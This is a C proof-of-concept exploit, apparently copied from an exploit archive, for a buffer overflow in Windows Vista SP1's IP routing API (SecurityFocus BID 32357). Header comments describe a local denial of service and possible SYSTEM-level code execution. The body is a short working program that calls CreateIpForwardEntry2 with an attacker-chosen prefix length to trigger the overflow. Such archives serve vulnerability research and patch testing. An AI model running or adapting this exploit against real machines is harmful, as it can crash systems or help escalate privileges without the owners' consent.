56 lines
No EOL
1.9 KiB
C
56 lines
No EOL
1.9 KiB
C
// source: https://www.securityfocus.com/bid/32357/info
|
|
|
|
// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
|
|
|
|
// Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
|
|
|
|
// Windows Vista SP1 is vulnerable to this issue.
|
|
|
|
// UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated.
|
|
|
|
#define _WIN32_WINNT 0x0600
|
|
#define WIN32_LEAN_AND_MEAN
|
|
|
|
#include <windows.h>
|
|
#include <winsock2.h>
|
|
#include <ws2ipdef.h>
|
|
#include <iphlpapi.h>
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
int main(int argc, char** argv)
|
|
{
|
|
DWORD dwStatus;
|
|
MIB_IPFORWARD_ROW2 route;
|
|
|
|
if (argc != 3)
|
|
{
|
|
printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
|
|
return -1;
|
|
}
|
|
|
|
InitializeIpForwardEntry(&route);
|
|
|
|
route.InterfaceIndex = atoi(argv[1]);
|
|
route.DestinationPrefix.Prefix.si_family = AF_INET;
|
|
|
|
route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");
|
|
route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;
|
|
|
|
route.DestinationPrefix.PrefixLength = atoi(argv[2]);
|
|
|
|
route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
|
|
route.NextHop.Ipv4.sin_family = AF_INET;
|
|
|
|
route.SitePrefixLength = 0;
|
|
|
|
route.Protocol = MIB_IPPROTO_NETMGMT;
|
|
route.Origin = NlroManual;
|
|
route.ValidLifetime = 0xffffffff;
|
|
route.PreferredLifetime = 0xffffffff;
|
|
route.Metric = 1;
|
|
|
|
dwStatus = CreateIpForwardEntry2(&route);
|
|
return dwStatus;
|
|
} |